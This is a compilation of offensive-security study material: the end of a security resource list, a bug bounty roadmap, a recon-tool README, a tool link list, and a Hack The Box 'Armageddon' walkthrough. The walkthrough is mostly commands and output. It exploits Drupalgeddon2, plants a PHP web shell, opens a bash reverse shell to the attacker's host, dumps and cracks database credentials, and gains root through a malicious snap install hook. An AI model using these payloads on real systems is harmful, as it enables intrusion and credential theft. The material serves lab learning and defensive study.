- PingCastle
- Project Page: https://www.pingcastle.com/
- Healthcheck Rules: https://www.pingcastle.com/PingCastleFiles/ad_hc_rules_list.html
- Kerbrute: https://github.com/ropnop/kerbrute
### Cloud
- A Cloud Guru Online Trainings: https://acloudguru.com/
### Container
- Docker Security
- How Containers Work!, Julia Evans, https://jvns.ca/blog/2020/04/27/new-zine-how-containers-work/
- Practical Docker Security: https://docs.google.com/presentation/d/1jZkq-osQYOCcpR6gU2V1M7JvM4MsazcgVpvGqOUIh-s/edit#slide=id.g4405d38279_0_218
- Docker.com: Docker Security Concepts: https://docs.docker.com/engine/security/security/
- Docker Security Blogpost: https://blog.sqreen.com/docker-security/
- 7 Docker Security Vulnerabilities: https://sysdig.com/blog/7-docker-security-vulnerabilities/
- Docker.com: Docker Breakout in 2014: https://blog.docker.com/2014/06/docker-container-breakout-proof-of-concept-exploit/
- Understanding Docker Container Escapes: https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/
- Docker & Capabilities by RedHat: https://www.redhat.com/en/blog/secure-your-containers-one-weird-trick
- Docker.com: Seccomp: https://docs.docker.com/engine/security/seccomp/
- Docker Capabilities and no-new-privileges: https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/
- Dockerfile Best Practices: https://docs.docker.com/develop/develop-images/dockerfile_best-practices/
- Dockerfile Security Best Practices: https://cloudberry.engineering/article/dockerfile-security-best-practices/
- Docker Images 10 Tips: https://snyk.io/blog/10-docker-image-security-best-practices/
- How to Keep Docker Secrets Secure: Complete Guide: https://spacelift.io/blog/docker-secrets
- Kubernetes
- Bad Pods: Kubernetes Pod Privilege Escalation: https://labs.bishopfox.com/tech-blog/bad-pods-kubernetes-pod-privilege-escalation#pod8
- Talk "Kubernetes from an Attacker's Perspective" by Abhisek Datta: https://www.youtube.com/watch?v=aloi74MH4zk
- Talk "Advanced Persistence Threats: The Future of Kubernetes Attacks" by Ian Coldwater and Ian Coldwater: https://www.youtube.com/watch?v=CH7S5rE3j8w
- Kubernetes Security Jupyter Notebooks: https://github.com/thomasfricke/training-kubernetes-security
### Hacking Environments
- Hack the Box: https://www.hackthebox.eu/
- Hack the Box Academy: https://academy.hackthebox.eu/
- PentesterLab: https://pentesterlab.com/
- Metasploitable: https://sourceforge.net/projects/metasploitable/
- Root Me: https://www.root-me.org
- VulnHub: https://www.vulnhub.com/
## Social Engineering 🎅
- Homograph Attacks: https://dev.to/logan/homographs-attack--5a1p
- Tool: https://github.com/evilsocket/ditto
- Example: https://раураӏ.com/
## Mobile Application Security 📱
### General
- Frida Hooking Framework: https://frida.re/
- Frida Hooks Collection: https://codeshare.frida.re/
- objection - Runtime Mobile Exploration: https://github.com/sensepost/objection
### Android
- Frida
- Frida Hook Examples: https://github.com/antojoseph/frida-android-hooks
- Frida Code Share: https://codeshare.frida.re/browse
- Frida Code Snippets for Android: https://erev0s.com/blog/frida-code-snippets-for-android/
- F-Secure Android Keystore Audit
- Blogpost: https://labs.f-secure.com/blog/how-secure-is-your-android-keystore-authentication/
- GitHub Project: https://github.com/FSecureLABS/android-keystore-audit
## Security for Small and medium-sized enterprises (SMEs) 🖖
- Merkblatt Informationssicherheit für KMUs vom Nationales Zentrum für Cybersicherheit NCSC: https://www.ncsc.admin.ch/dam/ncsc/de/dokumente/infos-unternehmen/ncsc-merkblatt-kmu-sicherheit.pdf.download.pdf/ncsc-merkblatt-kmu-sicherheit_de.pdf
- Generelle Informationen zu Cyber Security für Unternehmen: https://www.ibarry.ch/de/
- Resourcen von der Polizei Bern: https://www.cyber.police.be.ch/de/start/informationen-fuer-kmu.html insbesondere interessant für euch:
- Cyberdelikte verhindern - Wegleitung für KMU: https://www.cyber.police.be.ch/content/dam/police/dokumente/cyber/d/broschuere-cyberdelikte-verhindern-de.pdf
- Zehn Tipps, um Cyberangriffe zu verhindern: https://www.cyber.police.be.ch/content/dam/police/dokumente/cyber/d/cybercrime-zehn-tipps-de.pdf
- Selbstassessment für die Unternehmensleitung: https://www.cyber.police.be.ch/content/dam/police/dokumente/cyber/d/selbstassessment-de.pdf
- Cyberattacke - wie sich schützen. Checkliste für Unternehmensleitung: https://www.cyber.police.be.ch/content/dam/police/dokumente/cyber/d/checkliste-cyberattacke-unternehmensleitung-de.pdf
- Cyber Security für Kleine und Mittlere Unternehmen: https://www.enisa.europa.eu/publications/enisa-report-cybersecurity-for-smes/@@download/fullReport
|
# Bug Bounty RoadMap
Bug Bounty is the technique/process of finding bugs on programs by using different methodology and reporting those bugs to the respective program organizing company. After reporting the bug you receive a amount called bounty. Not all program provides you bounty for submitting for bug , programs like VDP appreciates your efforts and may provide some swags at best condition but no bounty.
## Requirements
- Intermediate knowledge of computer networking,data communications,web mechanism
- Basic knowledge of Html,Javascript,python,bash(to automate recon stuff)
- Never giving up,always learning mentality
## Step 1 (Reconnaissance)
Before doing any stuff , you first need to be good at reconnaissance.Reconnaisance is the process of gathering as much as information you can about the target program. Here, the term program can be interchangably regarded as target website.Reconnaisance step is all about gathering information by different automated tools or manually.Unlike in pentesting , in bug bounty recon most involves of finding subdomain owned by the program.
### Tools for recon and subdomain enumeration
- [Amass](https://github.com/OWASP/Amass)
- [ReEngine](https://github.com/yogeshojha/rengine)
- [SubDomainizer](https://github.com/nsonaniya2010/SubDomainizer)
## Step 2(Directory/File/Endpoints discovery)
After finding the subdomain of the program you are targeting . You need to look for all the endpoints on that website , all the hidden files and folder in the particular website. You can do those thinigs manually but it takes a lot of time and effort. To do that automatically, there are many automated tools availabe some of the popular tools are enlisted below.
### Tools for File/Endpoint discovery
- [GoBuster](https://github.com/OJ/gobuster)
- [KiteRunner](https://github.com/assetnote/kiterunner)
- [DirSearch](https://github.com/maurosoria/dirsearch)
- [OWASP ZAP(GUI)](https://owasp.org/www-project-zap/)
- [Recon(directory,port scanning)](https://github.com/maheshbasnet089/recon)
## Step 3 (Vulnerabilty Test)
All the endpoints and file you gathered after performing step 2 should be tested for vulnerabilty . In case of the folder and file path , you can perform path traversal, directory traversal attack. For the endpoint which is forbidden you can try to bypass that 403 forbidden by using many technique. Some endpoints may have information disclosure. Information disclosure is the process of leaking of data/information of the user of the website .Those information can be juicy for bruteforcing so keep note about it.You should intercept your traffic by using [Burpsuite](https://portswigger.net/burp/documentation/desktop/getting-started) to be more clear on what attack to perform next .
### How to perform vulnerabilty test
Try to look for form field, if the site doesnot handle input properly, you can use it to your advantage by performing attack like [XSS(cross site scripting)](https://medium.com/@maheshbasnet/cross-site-scripting-or-xss-13f49fed6cc5) .If the website is fetching some sort of data like image from outsource , you can try for SSRF(server site request forgery).If there is the userId or profileId in the URL you can lookout for IDOR vulnerabilty.
Similary if there is redirect,nextTo,open,next params in the Url, lookout for open redirect vulnerabilty. If you don't see any csrf token in the request header , you can try to lookout for CSRF(cross site request forgery).If the site is accepting xml filetype upload like pdf,docx,pptx you can lookout for XXE vulnerabilty.Other vulnerabilty like SQL injection can be also lookout for if the site uses SQL databases in contrast if it uses mongodb database lookout for [mongo injection](https://medium.com/@maheshbasnet/mongo-injection-sql-injection-a8b76cd8b193). Beside these other vulnerabilty like race around condition (especially in transaction doing website) and Insecure deserialization can be looked out.
## Step 4 (Fuzzing)
If you are tired to doing vulnerabilty assessment and looking out for vulnerabilty manually. You can try automated tools which saves a lot of time for you. Fuzzing is the process of sending repetive request to the targeted website automatically in a certain time interval.To performing credentials brute forcing,directory brute forcing, endpoints brute forcing , fuzzing process comes handy. To perform fuzzing there are many tools, besides those many tools some of the popular ones are listed below.
### Tools for fuzzing
- [Wfuzz](https://github.com/xmendez/wfuzz)
- [Ffuf](https://github.com/ffuf/ffuf)
## Step 4 (Report Writing)
If you found any vulnerabilty by performing step 3 . You need to report those vulnerabilty to the respective program company to earn your bounty(money).While writing report , you need to think that the report checkers knows nothing about the technology or he/she is 10 years kid.So write the report in so understandable and explainable way that the non technical person can understand it .
## Resources and Books
Google is the first thing to think about while thinking about resource . It contains everything , every problem solutions you are looking out for . If you get stuff on any topic you should simply force yourself to google it.Beside google there are some popular books which I highly recommend you to read because i had actually tasted those books myself and recommending you.
- Bug Bounty BootCamp by vickie lie (Theory More)
- The Real World Bug Hunting by peter yoworski (Practical More)
- The web Hacking(bible of website hacking)
- Hacking Apis (will be a plus point)
### Repositories to chekout for
- https://github.com/OWASP/wstg
- https://github.com/swisskyrepo/PayloadsAllTheThings
- https://github.com/KathanP19/HowToHunt
- https://github.com/danielmiessler/SecLists
- https://github.com/payloadbox/xss-payload-list
#### Person to checkout for
- [Hakluke](https://github.com/hakluke)
- [Tomnomnom](https://github.com/tomnomnom)
- [Jason Haddix](https://github.com/jhaddix)
- [Zseano](https://twitter.com/zseano)
- [STÖK](https://twitter.com/stokfredrik)
#### Labs to Pratice
- [picoctf](https://picoctf.org/)
- [tryhackme](https://tryhackme.com)
- [hackthebox](https://www.hackthebox.com/)
- [wargames](https://overthewire.org/wargames/)
- [PWNfunctionXss](https://xss.pwnfunction.com/)
- [portswiggerLabs](https://portswigger.net/web-security/learning-path)
- [OWASPJuiceShop](https://github.com/juice-shop/juice-shop)
#### Articles to Refer
- [hacktricks](https://book.hacktricks.xyz/)
- [pentesterland](https://pentester.land/)
- [BugBountyWriteUps](https://pentester.land/list-of-bug-bounty-writeups.html)
- [Medium](https://medium.com/tag/bug-bounty/latest)
#### Popular Methodologies
- [Jason Haddix](https://drive.google.com/file/d/1aG_qqRvNW-s5_8vvPk5rJiMSMeNL2uY9/view)
- [Zseano](https://www.bugbountyhunter.com/methodology/zseanos-methodology.pdf)
## Notes
I clearly want to state that , not everyone follows the same steps like above. Everyone have got different taste. It isn't have to have follow sort of things.According to the condition and circumstances you can create your own methodology which will favor you.
Some too don't consider to use linux at all for bug bounty.Linux is not have to have thing too. But it have go many tools already built in by default an bash which can automate your task , and saves time. If you have got burpsuite installed on system despise of OS, you are 90% ready for bug bounty
|
# Armageddon - Linux (Easy)
## Summary
Armageddon was a straightforward box that involved a Drupalgeddon2 exploit which is quite common. I was able to upload a webshell and run commands to get initial access. Once I got initial access, I was able to access the database where the admin hash, once cracked was reused. To escalate privileges to root, I was able to exploit the fact that the admin user is able to install snap packages as root.
## Enumeration
I began Enumeration with a `Rustscan` scan on the target, picking up open ports which were then fed to `Nmap` for a more thorough scan
```
rustscan -a $machine_IP -- -A -sV -sC -T4 -v
-sC - Script Scan
-sV - Version Scan
-T4 - Timing Template
-A - Aggresive Scan Options
-vv - Verbosity level
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open $machine_IP:22
Open $machine_IP:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.4 (protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-robots.txt: 36 disallowed entries
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
| /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php
| /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/
| /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/
| /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/
|_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/
|_http-generator: Drupal 7 (http://drupal.org)
|_http-favicon: Unknown favicon MD5: 1487A9908F898326EBABFFFD2407920D
|_http-title: Welcome to Armageddon | Armageddon
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupal',
'username' => 'drupaluser',
'password' => 'CQHEy@9M*m23gBVj',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
```
This resulted in two ports - 22 (SSH) and 80 (HTTP). I initially targeted Port 80 as SSH isn't usually a priority (I usually try password guessing - admin, root, box name and default passwords and they didn't work this time around). However, the Nmap scan actually pulled down the `drupaluser` credential with the associated password which I will attempt to login as shortly.
## Port 80 (HTTP)
I then ran Gobuster to full enumerate HTTP and any sub-directories that were hidden.
```
gobuster dir -u $machine_IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -x php,txt,css,js
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://$machine_IP
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,txt,css,js
[+] Timeout: 10s
===============================================================
2022/02/25 19:51:10 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 7440]
/misc (Status: 301) [Size: 233] [--> http://$machine_IP/misc/]
/themes (Status: 301) [Size: 235] [--> http://$machine_IP/themes/]
/modules (Status: 301) [Size: 236] [--> http://$machine_IP/modules/]
/scripts (Status: 301) [Size: 236] [--> http://$machine_IP/scripts/]
/sites (Status: 301) [Size: 234] [--> http://$machine_IP/sites/]
/includes (Status: 301) [Size: 237] [--> http://$machine_IP/includes/]
/install.php (Status: 200) [Size: 3172]
/profiles (Status: 301) [Size: 237] [--> http://$machine_IP/profiles/]
/update.php (Status: 403) [Size: 4057]
/README.txt (Status: 200) [Size: 5382]
/robots.txt (Status: 200) [Size: 2189]
/INSTALL.txt (Status: 200) [Size: 17995]
/cron.php (Status: 403) [Size: 7388]
/LICENSE.txt (Status: 200) [Size: 18092]
/CHANGELOG.txt (Status: 200) [Size: 111613]
/xmlrpc.php (Status: 200) [Size: 42]
/COPYRIGHT.txt (Status: 200) [Size: 1481]
/UPGRADE.txt (Status: 200) [Size: 10123]
/authorize.php (Status: 403) [Size: 2824]
```
The Nmap scan reported that the target was running version 7 but `changelog.txt` was more helpful as it provided valuable information about the specific version of Drupal 7 and I was able to enumerate information about latest security patches.
![changelog](Images/changelog.png)
Researching that particular version of Drupal provided more information about the [Drupalgeddon2](https://unit42.paloaltonetworks.com/unit42-exploit-wild-drupalgeddon2-analysis-cve-2018-7600/) exploit. The webpage on port 80 involved creating an account but it also required verifying via email which is a bit tricky with HackTheBox. However, since I had the granular version number, I was able to proceed. I was able to query a relevant exploit with `Searchsploit` but in this case, the results were slightly elusive and I ended up resorting to a [Github PoC](https://github.com/dreadlocked/Drupalgeddon2).
## Gaining User Foothold
Having installed Highline, a dependency for the script to run, I was able to get a break through
```
gem install highline
ruby drupalgeddon2.rb http://$machine_IP
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://$machine_IP/
--------------------------------------------------------------------------------
[+] Found : http://$machine_IP/CHANGELOG.txt (HTTP Response: 200)
[+] Drupal!: v7.56
--------------------------------------------------------------------------------
[*] Testing: Form (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Clean URLs
[!] Result : Clean URLs disabled (HTTP Response: 404)
[i] Isn't an issue for Drupal v7.x
--------------------------------------------------------------------------------
[*] Testing: Code Execution (Method: name)
[i] Payload: echo DPDCPLVM
[+] Result : DPDCPLVM
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file (http://$machine_IP/shell.php)
[i] Response: HTTP 404 // Size: 5
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[i] Fake PHP shell: curl 'http://$machine_IP/shell.php' -d 'c=hostname'
armageddon.htb>> id
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
```
Since I was able to demonstrate that the `curl` command could be modified to leak information, I was able to extend this further
![curl](Images/edit-curl.png)
```
curl -G --data-urlencode "c=bash -i >& /dev/tcp/$HTB_IP/443 0>&1" 'http://$machine_IP/shell.php'
```
I picked this up with a netcat listener and was logged in as the `Apache` entity
```
nc -lvnp 443
listening on [any] 443 ...
connect to [$HTB_IP] from (UNKNOWN) [$machine_IP] 40240
bash: no job control in this shell
bash-4.2$ id
id
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
```
Despite being unable to access the `/home` directory due to insufficient permissions, I was able to read the `/etc` file and determine that there was a legitimate user named `Brucetherealadmin`
![/etc/passwd](Images/etc-passwd.png)
I went to `/sites/default/` and opened `settings.php` which had the MySQL credentials identified earlier in the Nmap scan results
I was able to pull available tables with the following command
```
mysql -e 'show tables;' -u drupaluser -p 'CQHEy@9M*m23gBVj' drupal
```
Among the tables, one that interested me was `users`. I queried all the users in there and the only one that was generated was `Brucetherealadmin`
```
bash-4.2$ mysql -e 'select * from users;' -u drupaluser -p'CQHEy@9M*m23gBVj' drupal
<* from users;' -u drupaluser -p'CQHEy@9M*m23gBVj' drupal
uid name pass mail theme signature signature_format created access login status timezone languagepicture init data
0 NULL 0 0 0 0 NULL 0 NULL
1 brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt admin@armageddon.eu filtered_html 1606998756 1607077194 1607076276 1 Europe/London 0 admin@armageddon.eu a:1:{s:7:"overlay";i:1;}
```
I copied the hash to a text file and ran Hashcat on it
```
hashcat -a 0 -m 7900 hash.txt /usr/share/wordlists/rockyou.txt
$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt:booboo
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 7900 (Drupal7)
Hash.Target......: $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
```
Upon logging in via SSH, I was able to grab the user flag and also identified an attack vector to privesc
```
ssh brucetherealadmin@$machine_IP
[brucetherealadmin@armageddon ~]$ id
uid=1000(brucetherealadmin) gid=1000(brucetherealadmin) groups=1000(brucetherealadmin) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[brucetherealadmin@armageddon ~]$ whoami
brucetherealadmin
[brucetherealadmin@armageddon ~]$ pwd
/home/brucetherealadmin
[brucetherealadmin@armageddon ~]$ ls
user.txt
[brucetherealadmin@armageddon ~]$ cat user.txt
22d*****************************
[brucetherealadmin@armageddon ~]$ sudo -l
User brucetherealadmin may run the following commands on armageddon:
(root) NOPASSWD: /usr/bin/snap install *
```
## Privilege Escalation to Root
This was a very frustrating process and ended up taking far too long for an **easy** box but I ended up learning a lot out of it! [GTFO Bins](https://gtfobins.github.io/gtfobins/snap/) was my starting point for this process. A pre-requisite to generating the package is having fpm and I was able to install it with gem
```
gem install fpm
fp --version
```
I started by copying and running the default package
```
COMMAND=id
cd $(mktemp -d)
mkdir -p meta/hooks
printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
chmod +x meta/hooks/install
fpm -n xxxx -s dir -t snap -a all meta
```
Running the command resulted in a `xxx_1.0_all.snap` file and redirected me to a `/tmp` sub-directory
![snap](Images/snap.png)
Following this, I opened a Python Server on Port 80 and picked it up from the victim through a `curl` command
```
$ curl 10.10.14.10/xxxx_1.0_all.snap -o test.snap
[brucetherealadmin@armageddon ~]$ ls
test.snap user.txt
[brucetherealadmin@armageddon ~]$ sudo snap install test.snap --dangerous --devmode
```
Having run the `curl` command, I renamed the output to `test.snap`. After this, I was able to execute it to verify that `$COMMAND` produced the output of the id command.
```
sudo snap install test.snap --dangerous --devmode
```
Seeing this being successfully tested, I was able to extend this to do a file-read of the `root.txt` flag.
![root.txt](Images/root.txt.png)
## Cert
![cert](Images/cert.png) |
# theGreatRecon
Note that the script isn't 100% automated. it gets you to type some Y or N in it.
======
theGreatSetup.sh is the Script for installing and configuring my daily recon tools.
Debian Based only.
====
the script creates:
~/go
~/go/bin
~/go/pkg
~/go/src
~/tools
and install all tools necessary for running properly:
- nahamsec's lazyrecon script
- ofjaaah's recon script
- almost all of Kingofbugbounty tips oneliners
====
Please remember to:
- change YOURAPIKEY from GitHub on ofjaaaaah.sh at github-search
- set up your AWS config file on ~/.aws
- get me on twitter @dalbonip
:)
|
<h1>Bug-Bounty Writeup Section 👨💻 : For All, by All (regular updates)</h1>
<a href="https://fardeen-ahmed.github.io/">
<img src="https://github.com/fardeen-ahmed/Bug-bounty-Writeups/blob/main/1.png" alt="None" align="center" height="250" width="1000">
</a>
<h4>This is a place of all the Offensive Cybersecurity people. Feel free to contribute in all sections</h4>
<h2> Bug-Bounty Tools & Extensions (General + Updated) :- </h2><br>
<a href="https://github.com/RenwaX23/XSSTRON">- XSSTRON :-Electron JS Browser To Find XSS Vulnerabilities Automatically</a><p>
<a href="https://github.com/mdsecresearch/BurpSuiteSharpener">-Extension should add a number of UI and functional features to Burp Suite to make working with it easier</a>
<a href="https://medium.com/@calfcrusher/automate-and-finds-the-ip-address-of-a-website-behind-cloudflare-45db99510b4b">-Automate and finds the IP address of a website behind Cloudflare</a>
<a href="https://github.com/m8r0wn/taser">-Taser : Python3 resource library for creating security related tooling</a>
<a href="https://github.com/thelicato/fire">-fire is a simple tool meant to work in a pipeline of other scripts. It takes domains on stdin and outputs them on stdout if they resolve. </a>
<a href="https://research.nccgroup.com/2022/11/10/tool-release-web3-decoder-burp-suite-extension/amp/">-Tool Release – Web3 Decoder Burp Suite Extension</a>
<a href="https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9">-MetaMask Clickjacking Vulnerability Analysis</a>
<a href="https://github.com/tristanlatr/burpa">-Burp Automator - A Burp Suite Automation Tool. It provides a high level CLI and Python interfaces to Burp Suite scanner and can be used to setup Dynamic Application Security Testing (DAST)</a>
<a href="https://github.com/gwen001/related-domains">-Related-domains : Find related domains of a given domain</a>
<a href="https://github.com/edoardottt/csprecon">-CSPRecon - Discover new target domains using Content Security Policy</a>
<a href="https://github.com/iangcarroll/cookiemonster">-CookieMonster helps you detect and abuse vulnerable implementations of stateless sessions.</a>
<a href="https://www.securesystems.de/blog/subdomain-enumeration-with-DNSSEC/">-Subdomain Enumeration with DNSSEC</a>
<a href="https://medium.com/@kaorrosi/osint-research-with-recon-ng-727661a70ea4">-OSINT Research With Recon-ng</a>
<a href="https://github.com/benso-io/posta">-Posta. Cross-document Messaging security research tool</a>
<a href="https://github.com/projectdiscovery/katana">-Katana : A next-generation crawling and spidering framework.</a>
<a href="https://github.com/silentsignal/burp-text4shell">-Text4Shell scanner for Burp Suite</a>
<a href="https://being-uncommon.medium.com/rustscan-the-modern-port-scanner-d6d3084e9c82">-RUSTSCAN — THE MODERN PORT SCANNER</a>
<a href="https://mikekitckchan.medium.com/holy-ffuf-a-beginner-guide-to-fuzz-with-ffuf-4bc6a66b5391">-Holy FFUF! — A Beginner Guide to Fuzz with FFUF</a>
<a href="https://github.com/swisskyrepo/GraphQLmap">-GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes</a>
<a href="https://labs.detectify.com/2021/08/10/how-to-hack-apis-in-2021/">-How to Hack APIs in 2021</a>
<a href="https://github.com/erev0s/VAmPI">VAmPI - Vulnerable REST API with OWASP top 10 vulnerabilities for security testing</a>
<a href="https://akshita-infosec.medium.com/burp-macros-what-why-how-151df8901641">-Burp Macros: What, Why & How?</a>
<a href="https://github.com/0x4ndy/clif">-clif is a command-line interface (CLI) application fuzzer, pretty much what wfuzz or ffuf are for web. </a>
<a href="https://github.com/r0oth3x49/ghauri">-Ghauri - An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws</A>
<a href="https://portswigger.net/blog/introducing-dom-invader">Introducing DOM Invader: DOM XSS just got a whole lot easier to find</a>
<a href="https://github.com/MayankPandey01/Jira-Lens">-Jira-Lens Fast and customizable vulnerability scanner For JIRA written in Python</a>
<a href="https://sicks3c.medium.com/setup-your-private-burp-collaborator-for-ssrf-xxe-fd6cf01c8ca">-Setup Your Private Burp Collaborator for SSRF/XXE</a>
<a href="https://portswigger.net/blog/experience-burp-suite-enterprise-edition-in-a-new-live-demo">-Experience Burp Suite Enterprise Edition in a new live demo</a>
<a href="https://github.com/rotemreiss/uddup">-Urls de-duplication tool for better recon.</a>
<a href="https://github.com/phith0n/zkar">-ZKar is a Java serialization protocol analysis tool implement in Go</a>
<a href="https://github.com/s0md3v/Smap">-Smap : a drop-in replacement for Nmap powered by shodan.io</a>
<a href="https://github.com/Stonzyy/dumpxss">-DumpXSS. Scanner Tool For XSS Vulnerability</a>
<a href="https://github.com/Sh1Yo/x8">-x8 - Hidden parameters discovery suite written in Rust.</a>
<A href="https://www.pavel.gr/blog/dll-hijacking-using-spartacus-outside-of-dllmain">-DLL Hijacking using Spartacus, outside of DllMain</a>
<a href="https://github.com/stark0de/nginxpwner">-Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulnerabilities.</a>
<a href="https://github.com/mrh0wl/Cloudmare">-Cloudflare, Sucuri, Incapsula real IP tracker</a>
<a href="https://mikekitckchan.medium.com/a-brief-introduction-to-prototype-pollution-b154c23b40c5">-A Brief Introduction to Prototype Pollution</a>
<a href="https://caido.io/">-Caido - Lightweight Web Security Auditing Toolkit</a>
<a href="https://securitytrails.com/blog/assetfinder">-AssetFinder: A Handy Subdomain and Domain Discovery Tool</a>
<a href="https://devsecopsdocs.com/blog/nuclear-pond/">-Nuclear Pond</a>
<a href="https://github.com/punk-security/secret-magpie-cli">-Secret Magpie - Secret Detection Tool</a>
<a href="https://googleprojectzero.blogspot.com/2021/04/designing-sockfuzzer-network-syscall.html">-Designing sockfuzzer, a network syscall fuzzer for XNU</a>
<a href="https://github.com/kosmosec/proto-find">-Proto Find. Let's check if your target is vulnerable for client side prototype pollution</a>
<a href="https://github.com/KathanP19/protoscan">-Prototype Pollution Scanner made in Golang</a>
<a href="https://github.com/PabloMK7/ENLBufferPwn">-BufferPwn: RCE vulnerability in the common network code of several first party Nintendo games since the Nintendo 3DS</a>
<a href="https://portswigger.net/daily-swig/new-differential-fuzzing-tool-reveals-novel-http-request-smuggling-techniques">-New differential fuzzing tool reveals novel HTTP request smuggling techniques</a>
<a href="https://blog.intigriti.com/2021/10/05/hacker-tools-crlfuzz/">-CRLFuzz – Hacker Tools: Injecting CRLF for bounties </a>
<a href="https://blog.securelayer7.net/static-analysis-of-android-application-tools-used-securelayer7/">-OWASP Top 10: Static Analysis of Android Application & Tools Used</a>
<a href="https://github.com/sa7mon/S3Scanner">-S3Scanner - Scan for open S3 buckets and dump the contents </a>
<a href="https://github.com/dhn/udon">-UDON - A simple tool that helps to find assets/domains based on the Google Analytics ID. </a>
<a href="https://www.revshells.com/">-Online - Reverse Shell Generator</a>
<a href="https://github.com/Eilonh/s3crets_scanner">-S3cret Scanner: Hunting For Secrets Uploaded To Public S3 Buckets</a>
<a href="https://github.com/redhuntlabs/HTTPLoot">-HTTPLoot : An automated tool which can simultaneously crawl, fill forms, trigger error/debug pages and "loot" secrets out of the client-facing code of sites.</a>
<a href="https://github.com/iustin24/chameleon">-Chameleon provides better content discovery by using wappalyzer's set of technology fingerprints alongside custom wordlists tailored to each detected technologies</a>
<a href="https://medium.com/@murami.ike/working-with-a-scope-using-gowitness-4d338b0321ac">-Working with a scope using Gowitness</a>
<a href="https://www.hackingarticles.in/a-detailed-guide-on-cewl/">-A Detailed Guide on Cewl</a>
<a href="https://github.com/hakluke/hakoriginfinder">-hakoriginfinder : Tool for discovering the origin host behind a reverse proxy. Useful for bypassing WAFs and other reverse proxies</a>
<a href="https://github.com/carlospolop/PurplePanda">-PurplePanda : Identify privilege escalation paths within and across different clouds</a>
<a href="https://github.com/ethicalhackingplayground/TProxer">-A Burp Suite extension made to automate the process of finding reverse proxy path based SSRF</a>
<a href="https://github.com/PalindromeLabs/STEWS">-STEWS is a tool suite for security testing of WebSockets</a>
<a href="https://github.com/xerohackcom/webrecon">-Webrecon : Automated Web Recon Shell Scripts</a>
<a href="https://danielmiessler.com/study/ffuf/">-A ffuf Primer</a>
<a href="https://github.com/Lu1sDV/wafme0w">-Wafme0w - Fast and lightweight Web Application Firewall fingerprinting tool.</a>
<a href="https://github.com/r0oth3x49/ghauri">-Ghauri : An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws</a>
<a href="https://github.com/carlospolop/Leakos">-Leakos- Search with gitleaks and trufflehog in the responses of the given URLs or in all the repos of an organization and its members.</a>
